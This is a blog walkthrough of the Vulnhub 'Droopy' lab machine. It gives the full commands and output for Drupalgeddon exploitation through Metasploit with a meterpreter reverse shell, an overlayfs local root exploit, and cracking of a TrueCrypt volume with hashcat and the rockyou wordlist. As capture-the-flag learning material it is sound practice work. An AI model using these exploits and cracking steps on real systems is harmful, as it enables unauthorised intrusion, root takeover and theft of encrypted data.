Vulnhub – Droopy: v0.2

Introducion

This is a quick post about how to hack this vulnerable virtual machine found in Vulnhub website. Just to be clear I am not a security professional, I am just learning and preparing myself to OCSP exam. If you found any mistake please let me know.

Walkthrough

First we do some network discovery with netdiscover:

netdisc

We see that host is at 192.168.1.159. Let’s do nmap scan:

nmap -sS -A -O -vv 192.168.1.159 -Pn > nmap.txt

PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack ttl 64 Apache httpd 2.4.7 ((Ubuntu))
|_http-favicon: Unknown favicon MD5: B6341DFC213100C61DB4FB8775878CEC
|_http-generator: Drupal 7 (http://drupal.org)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 36 disallowed entries
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
| /LICENSE.txt /MAINTAINERS.txt /update.php /UPGRADE.txt /xmlrpc.php
| /admin/ /comment/reply/ /filter/tips/ /node/add/ /search/
| /user/register/ /user/password/ /user/login/ /user/logout/ /?q=admin/
| /?q=comment/reply/ /?q=filter/tips/ /?q=node/add/ /?q=search/
|_/?q=user/password/ /?q=user/register/ /?q=user/login/ /?q=user/logout/
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Welcome to La fraude fiscale des grandes soci\xC3\xA9t\xC3\xA9s | La fraud…
MAC Address: 00:0C:29:4A:B9:32 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 – 4.0

NMAP shows in this machine there is a website hosted by Apache webserver and Drupal is running on it. I’ve investigated the site and it requires login and password. Fire up Metasploit Framework and let’s do a quick check, find an exploit suitable to our victim. Because Drupal uses MySQL database its quite trivial that a SQL injection could work.

drupal_search

I choosed the third one and fingers crossed. Boom, we have a meterpreter connection.

msf > use exploit/multi/http/drupal_drupageddon
msf exploit(drupal_drupageddon) > options

Module options (exploit/multi/http/drupal_drupageddon):

Name Current Setting Required Description
—- ————— ——– ———–
Proxies no A proxy chain of format type:host:port[,type:host:port][…]
RHOST 192.168.1.159 yes The target address
RPORT 80 yes The target port
TARGETURI / yes The target URI of the Drupal installation
VHOST no HTTP server virtual host
Payload options (php/meterpreter/reverse_tcp):

Name Current Setting Required Description
—- ————— ——– ———–
LHOST 192.168.1.200 yes The listen address
LPORT 4444 yes The listen port
Exploit target:

Id Name
— —-
0 Drupal 7.0 – 7.31
msf exploit(drupal_drupageddon) > exploit

[*] Started reverse TCP handler on 192.168.1.200:4444
[*] 192.168.1.159:80 – Testing page
[*] 192.168.1.159:80 – Creating new user SsozXsiTZb:UldknxsZnY
[*] 192.168.1.159:80 – Logging in as SsozXsiTZb:UldknxsZnY
[*] 192.168.1.159:80 – Trying to parse enabled modules
[*] 192.168.1.159:80 – Enabling the PHP filter module
[*] 192.168.1.159:80 – Setting permissions for PHP filter module
[*] 192.168.1.159:80 – Getting tokens from create new article page
[*] 192.168.1.159:80 – Calling preview page. Exploit should trigger…
[*] Sending stage (33068 bytes) to 192.168.1.159
[*] Meterpreter session 9 opened (192.168.1.200:4444 -> 192.168.1.159:35380) at 2016-04-19 11:06:36 +0200

meterpreter >

Nice news, let’s lurk around and get informations out of the system. I used sysinfo command and let’s see what is it.

meterpreter > sysinfo
Computer : droopy
OS : Linux droopy 3.13.0-43-generic #72-Ubuntu SMP Mon Dec 8 19:35:06 UTC 2014 x86_64
Meterpreter : php/php
meterpreter >

So this is an Ubuntu machine with an old kernel. I am trying my luck and check  if this machine is vulnerable to overlayfs vulnerability or not, what user persmissions I have, am I able to compile my exploit with gcc and run it.

First transfer the exploit to /tmp folder with meterpreter’s upload command and try to execute it:

meterpreter > getuid
Server username: www-data (33)
meterpreter > upload /root/Downloads/37292.c /tmp
[*] uploading : /root/Downloads/37292.c -> /tmp
[*] uploaded : /root/Downloads/37292.c -> /tmp/37292.c
meterpreter > shell
Process 1256 created.
Channel 1 created.
cd /tmp
gcc 37292.c -o exploit
chmod +x exploit
./exploit
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
sh: 0: can’t access tty; job control turned off
# whoami
root
#

Nice, we have root access to the system, let’s find the flag. Usually flag takes place in the root directory, so let’s see what we have.

dave.tc

Dave.tc? Wut? After googling a bit I found that .tc extension could be a TrueCrypt password protected file. Google says that TrueCrypt are discontinued and password protected volumes can be hacked with proper program and with a good dictionary. My first thought was OclHashcat because I have an AMD card, and truecracker in Kali Linux supports Nvidia card (only?). I didn’t do research if it supports AMD too, because I am happy with OclHashcat. When I downloaded this vulnerable machine I saw two hints:

1.) Grab a copy of the rockyou wordlist.

2.) It’s fun to read other people’s email.

Okay, I have rockyou wordlist so check /var/mail:

mail

Okay, let’s rock:

oclHashcat64.exe -a 0 -m 6211 -p : –session=all -o “D:\Penetration\HASHGPUCRACK\dave_found.txt” –outfile-format=3 -w 3 –gpu-temp-disable “C:\Users\media\Desktop\dave.tc” “D:\Penetration\wordlist\rockyou.txt”

Exhausted. Nothing. At this point several hours later still nothing. I tried to apply rules (best64), different dictionaries, nothing. The last sentence also could give a hint, I did a dictionary combinaton attack ( downloaded lyrics from The Jam, did a dictionary from this and combinated with rockyou). Still no luck. Will I fail at this point? This was so easy until this point. TRY HARDER! So I did a break and when I sit front of my computer again I had clue. What if I am trying with wrong hashing algorithm? Some guys on hashcat forums mentioned that should try SHA512 algorithm instead of RipeMD160. Okay, fire up OclHashcat again.

oclHashcat64.exe -a 0 -m 6221 -p : –session=all -o “D:\Penetration\HASHGPUCRACK\dave_found.txt” –outfile-format=3 -w 3 –gpu-temp-disable “C:\Users\media\Desktop\dave.tc” “D:\Penetration\wordlist\rockyou.txt”

After a couple of minutes it finished. Cracked. Okay, lets install TrueCrypt and check what we got. When it prompt for password I tried Copy/Paste and….. Wrong password. OMG what happening? Again CTRL+C CTRL+V, still no luck. Could it be possible? What if I type the password instead of copy/paste? Yes, it was my fault. It shows the drive, mounted to drive H:

drive

Check out this drive. Nothing interesting, some jpg files and a .secret folder. HMMM!

I opened this one and under the .top folder I captured the flag.

flag

This was quite fun! Thank you!

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s